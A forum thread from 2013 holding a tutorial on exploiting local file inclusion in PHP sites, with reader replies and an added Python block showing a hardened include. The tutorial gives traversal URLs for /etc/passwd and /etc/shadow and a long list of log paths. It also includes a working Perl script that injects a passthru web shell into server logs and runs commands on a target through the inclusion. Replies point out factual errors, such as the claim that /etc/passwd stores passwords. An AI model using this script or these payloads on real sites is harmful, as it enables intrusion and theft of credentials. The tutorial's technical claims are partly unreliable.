Castiel Posted December 8, 2013

Hi, rst! In this tutorial you will learn how to exploit the LFI vulnerability in a site. First, let's look at this small piece of PHP code:

    <?php
    $page = $_GET['page'];
    include($page);
    ?>

This is code that should never be used, vulnerable to LFI, because the $page variable is not sanitized. OK, now let's take advantage of this vulnerability using the following URL:

    site.host/index.php?page=../../../../../../../etc/passwd

If the site is hosted on Unix, the users' passwords are stored in /etc/passwd, and the URL above shows us those passwords and usernames. Now all you have to do is decode the password. An encrypted password should look something like this:

    username:x:503:100:FullName:/home/username:/bin/sh

In this example the password is x; another example of a password is:

    username:!:503:100:FullName:/home/username:/bin/sh

Other "places" where you can find passwords besides /etc/passwd would be:

    /etc/group
    /etc/security/group
    /etc/security/passwd
    /etc/security/user
    /etc/security/environ
    /etc/security/limits
    /etc/shadow

If the browser shows a .php at the end of the inclusion (and /etc/passwd.php will automatically not exist), add at the end of the inclusion; the server will ignore everything written after it. Example:

    site.host/index.php?file=../../../../../../../../etc/passwd

Now we will try to run commands on the server by injecting PHP code into the logs and then running it. Some log locations:

    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log
    ../apache/logs/error.log

OK, now let's take a look at the log in which requests for pages that do not exist are recorded, and at the following code: <? passthru($_GET[cmd]) ?>. If we type into the browser:

    site.host/<? passthru($_GET[cmd]) ?>

it will obviously show us a page saying that this does not exist on the server, because the browser automatically URL-encodes the address, and the page we accessed is translated by the browser into:

    site.host/%3C?%20passthru($_GET[cmd])%20?%3E

So we will have to do something else...

We can use the following Perl script:

    #!/usr/bin/perl -w
    # Injects PHP code into the web server's error log through the request line
    # and the User-Agent header, then includes that log via the LFI to run commands.
    use IO::Socket;

    $site = "victim.com";
    $path = "/folder/";
    $code = "<? passthru(\$_GET[cmd]) ?>";
    $log  = "../../../../../../../etc/httpd/logs/error_log";

    # Step 1: send a request carrying the PHP code so that it lands in the log.
    print "Trying to inject the code";
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80")
        or die "\nConnection Failed.\n\n";
    print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
    print $socket "User-Agent: " . $code . "\r\n";
    print $socket "Host: " . $site . "\r\n";
    print $socket "Connection: close\r\n\r\n";
    close($socket);
    print "\nCode $code successfully injected in $log \n";

    # Step 2: include the poisoned log through the vulnerable page parameter and
    # pass each command in the cmd parameter that passthru() reads.
    print "\nType command to run or exit to end: ";
    $cmd = <STDIN>;
    chomp($cmd);
    while ($cmd !~ "exit") {
        $cmd =~ s/ /%20/g;    # a literal space would break the request line
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80")
            or die "\nConnection Failed.\n\n";
        print $socket "GET " . $path . "index.php?page=" . $log . "&cmd=$cmd HTTP/1.1\r\n";
        print $socket "Host: " . $site . "\r\n";
        print $socket "Accept: */*\r\n";
        print $socket "Connection: close\r\n\r\n";
        while ($show = <$socket>) { print $show; }
        close($socket);
        print "Type command to run or exit to end: ";
        $cmd = <STDIN>;
        chomp($cmd);
    }
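The post shows the vulnerable include and the traversal that abuses it but never the fix. The block below is an added example written for this page, not code from the post: a Python model of the `include($_GET['page'])` pattern beside a hardened resolver, both run against a constructed web root. The page names home/about, the pages/ directory and secret.txt (standing in for /etc/passwd) are assumptions made for the demonstration. The hardened resolver also refuses a NUL byte in the name (the trick used against scripts that append .php themselves) and php:// style stream wrappers, which the simple traversal check alone would not cover.

```python
"""Added example: vulnerable include($_GET['page']) modelled in Python next to a
hardened resolver. Web root layout, page names and secret.txt are assumptions."""
import os
import re
import tempfile

ALLOWED_PAGES = {"home", "about"}              # assumed set of legitimate pages
SAFE_NAME = re.compile(r"^[a-z0-9_-]{1,32}$")  # defence in depth behind the allowlist


def make_webroot():
    """Constructed web root: pages/home.php, pages/about.php and a secret
    outside the pages directory that plays the role of /etc/passwd."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    for name in ALLOWED_PAGES:
        with open(os.path.join(pages, name + ".php"), "w") as fh:
            fh.write("<?php echo '%s'; ?>\n" % name)
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed passwd-style line
    return root


def vulnerable_resolve(webroot, page, suffix=""):
    """Mirror of the post's PHP: the parameter goes straight into the path.
    `suffix` models the variant where the script appends ".php" itself."""
    return os.path.join(webroot, "pages", page + suffix)


def safe_resolve(webroot, page):
    """Hardened version: reject NUL bytes and stream wrappers, allowlist the
    name, then canonicalise and confirm the result stays under pages/."""
    if "\x00" in page or "://" in page:
        raise ValueError("null byte or stream wrapper in page name")
    if not SAFE_NAME.match(page) or page not in ALLOWED_PAGES:
        raise ValueError("page not in allowlist")
    base = os.path.realpath(os.path.join(webroot, "pages"))
    target = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes the pages directory")
    return target


def do_include(resolver, webroot, page, **kw):
    """Read the resolved file, the equivalent of PHP's include()."""
    with open(resolver(webroot, page, **kw)) as fh:
        return fh.read()


def is_rejected(webroot, page):
    """True when the hardened resolver refuses the page name."""
    try:
        safe_resolve(webroot, page)
    except ValueError:
        return True
    return False


def demo():
    """Run the comparison once and return what each resolver did."""
    root = make_webroot()
    traversal = "../secret.txt"  # same idea as ../../../../../../../etc/passwd
    return {
        "vulnerable_leaks_secret": "root:x:0:0" in do_include(vulnerable_resolve, root, traversal),
        "vulnerable_with_suffix_serves_home": do_include(
            vulnerable_resolve, root, "home", suffix=".php").startswith("<?php echo 'home'"),
        "safe_serves_home": do_include(safe_resolve, root, "home").startswith("<?php echo 'home'"),
        "safe_rejects_traversal": is_rejected(root, traversal),
        "safe_rejects_null_byte": is_rejected(root, "home\x00"),
        "safe_rejects_wrapper": is_rejected(root, "php://filter/resource=index"),
        "safe_rejects_unknown_page": is_rejected(root, "admin"),
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print("%-36s %s" % (check, outcome))
```

The allowlist is what actually closes the hole; the realpath/commonpath check is there so that a later change to the allowlist (say, a page name that contains a slash) cannot silently reopen it.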
SilenTx0 Posted December 8, 2013

Source? Or do you think that if you change one or at most two words the tutorial becomes yours? Shame!
dancezar Posted December 8, 2013

Rather muddled writing: "where you can find passwords besides /etc/passwd would be:". /etc/passwd has no passwords. Then you forgot to mention the null byte %00 for when the script appends .php at the end. And where are the php://input and php://filter methods?
Castiel (Author) Posted December 8, 2013

Did I say I wrote it? :)) It's from pro-area; I only fixed some mistakes.
Castiel (Author) Posted December 8, 2013

askwrite, did you need a +1? ON: LFI - Local File Inclusion
SilenTx0 Posted December 8, 2013

Since you didn't post the source, it is understood that you wrote it :) no need to mention that.
aelius Posted December 8, 2013

Quoting Castiel:

    If the site is hosted on Unix, the users' passwords are stored in /etc/passwd, and the URL above shows us those passwords and usernames.
    Now we will try to run commands on the server by injecting PHP code into the logs and then running it.
    An encrypted password should look something like this: username:x:503:100:FullName:/home/username:/bin/sh

Ouch, mother ...
akkiliON Posted December 8, 2013

Ouch, mother ...